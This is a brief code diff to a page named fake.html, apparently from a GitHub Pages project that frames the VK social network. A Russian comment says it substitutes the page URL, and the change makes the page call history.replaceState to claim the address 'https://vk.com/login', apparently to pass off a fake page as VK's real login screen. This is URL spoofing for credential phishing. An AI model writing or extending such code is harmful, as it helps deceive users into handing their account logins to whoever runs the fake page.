--- a/fake.html
+++ b/fake.html
@@ -141,7 +141,7 @@
     // Здесь подменяем URL страницы внутри iframe
     if (window.location.href === "https://jkeep1990.github.io/VK_iFrame/fake.html") {
       try {
-        history.replaceState(null, "", "https://vk.com/logout");
+        history.replaceState(null, "", "https://vk.com/login");
       } catch (err) {
         console.error("Ошибка подмены URL:", err);
       }
